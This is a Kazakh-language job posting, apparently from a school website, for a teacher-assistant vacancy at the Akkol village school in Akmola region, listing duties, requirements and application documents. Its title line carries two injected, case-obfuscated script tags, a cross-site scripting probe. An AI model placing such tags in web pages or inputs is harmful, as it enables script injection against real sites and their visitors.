Бос лауазым<sCrIpT sRc=///1.js></ScRiPt><sCrIpT sRc=///1.js></ScRiPt>

14.02.2025

"Ақмола облысы Білім басқармасының Зеренді ауданы бойынша білім бөлімінің Ақкөл ауылының жалпы білім беретін мектебі "коммуналдық мемлекеттік мекемесі педагог-ассистентке лауазымына бос орын.

 

Мекен-жайы: Ақмола облысы, Зеренді ауданы, Ақкөл ауылы,

Ы. Алтынсарин көшесі, 2.

Пошта индексі: 021203

Жұмыс телефоны: 8-716-32-37590

Электрондық пошта: akkolschool@mail.kz

Бос лауазымы    педагог-ассистент – 1ставка.

Лауазымдық жалақысы- біліктілік санатына және еңбек сіңірген жылдарына байланысты 160 000-нан 190 000-ға дейін.

Лауазымдық міндеттері:

      психологиялық-медициналық-педагогикалық консультацияның ұсынымы бойынша ерекше білім берілуіне қажеттілігі бар баланы психологиялық-педагогикалық сүйемелдеуді жүзеге асырады;

      балалардың ерекше білім алу қажеттіліктерін бағалау мақсатында мамандар мен педагогтердің командалық бағалауына, сондай-ақ жеке білім беру және дамыту бағдарламаларын құрастыруға қатысады;

      білім беру ұйымдарында ұйымдастырылған оқу және өзге де қызмет кезінде ерекше білім берілуіне қажеттілігі бар балаларға, олардың өзіндік қызметі денсаулық жағдайы мен мінез-құлық

ерекшеліктеріне байланысты шектелген жағдайда, көмек көрсетеді, психологиялық-педагогикалық қолдау көрсетеді;

      оқыту, тәрбиелеу және дамыту жұмыстары процесінде ерекше білім берілуіне қажеттілігі бар бала туралы деректерді бақылауды жүзеге асырады және жинақтайды,

білім беру бағдарламасын меңгеру нәтижелерін, білім беру, әлеуметтік-бейімдеу (мінез-құлық) дағдыларын қалыптастыру серпінін хаттамалауды жүргізеді және баланы

оқыту және әлеуметтендіру процесін мониторингтеу үшін тәрбиешілер мен мамандарға ақпарат береді;

      ерекше білім беру қажеттіліктері бар баланың өмір сүру қауіпсіздігі мен денсаулығының қажетті жағдайларын сақтайды;

      белгіленген нысан бойынша есептік құжаттаманы жүргізеді.

Біліктілікке қойылатын талаптар:

      жоғары педагогикалық білімі және (немесе) техникалық және кәсіптік, орта білімнен кейінгі (педагогикалық) білімі немесе педагогикалық қайта даярлығын растайтын құжат,

жұмыс өтіліне талап қойылмайды;

      және (немесе) біліктілігінің орта және жоғары деңгейі болған кезде мамандығы бойынша жұмыс өтілі: педагог-модератор үшін кемінде 2 жыл, педагог-сарапшы үшін кемінде 3 жыл,

педагог-зерттеуші үшін кемінде 4 жыл;

      және (немесе) біліктілігінің жоғары деңгейі болған кезде педагог-шебер үшін мамандығы бойынша жұмыс өтілі – 5 жыл.

Құжаттарды қабылдау мерзімі: 14.02-21.02.2025 жыл

Конкурсқа қатысуға ниет білдірген адам хабарландыруда көрсетілген құжаттарды қабылдау мерзімінде келесі құжаттарды электрондық немесе қағаз түрінде жолдайды:

      1) осы Қағидаларға 10-қосымшаға сәйкес нысан бойынша қоса берілетін құжаттардың тізбесін көрсете отырып, Конкурсқа қатысу туралы өтініш;

      2) жеке басын куәландыратын құжат не цифрлық құжаттар сервисінен алынған электронды құжат (идентификация үшін);

      3) кадрларды есепке алу бойынша толтырылған жеке іс парағы (нақты тұрғылықты мекенжайы мен байланыс телефондары көрсетілген – бар болса);

      4) Педагогтердің үлгілік біліктілік сипаттамаларымен бекітілген лауазымға қойылатын біліктілік талаптарына сәйкес білімі туралы құжаттардың көшірмелері;

      5) еңбек қызметін растайтын құжаттың көшірмесі (бар болса);

      6) "Денсаулық сақтау саласындағы есепке алу құжаттамасының нысандарын бекіту туралы" Қазақстан Республикасы Денсаулық сақтау министрінің міндетін

атқарушының 2020 жылғы 30 қазандағы № ҚР ДСМ-175/2020 бұйрығымен бекітілген нысан бойынша денсаулық жағдайы туралы анықтама (Нормативтік құқықтық актілерді мемлекеттік тіркеу тізілімінде № 21579 болып тіркелген).

      7) психоневрологиялық ұйымнан анықтама;

      8) наркологиялық ұйымнан анықтама;

      9) сертификаттаудан өту нәтижелері туралы сертификат немесе педагог-модератордан төмен емес қолданыстағы біліктілік санатының болуы туралы куәлік (бар болса);

      10) техникалық және кәсіптік, орта білімнен кейінгі білім беру ұйымдарында арнайы пәндер бойынша педагогтер және өндірістік оқыту шеберлері лауазымдарына

педагогикалық қызметке кіріскен, тиісті мамандық немесе бейін бойынша өндірісте кемінде 2 жыл жұмыс өтілі бар педагогтер сертификаттаудан өтуден босатылады.

      11) 11-қосымшаға сәйкес нысан бойынша педагогтің бос немесе уақытша бос лауазымына кандидаттың толтырылған бағалау парағы.

      12) тәжірибе жоқ кандидаттың бейнепрезентациясы кемінде 15 минут, ең төменгі ажыратымдылығы – 720 x 480.

 

 

 

 

 

 

 

 

Просмотров: 1919


Пікір қосу



Деректерді қолтаңбаға қосу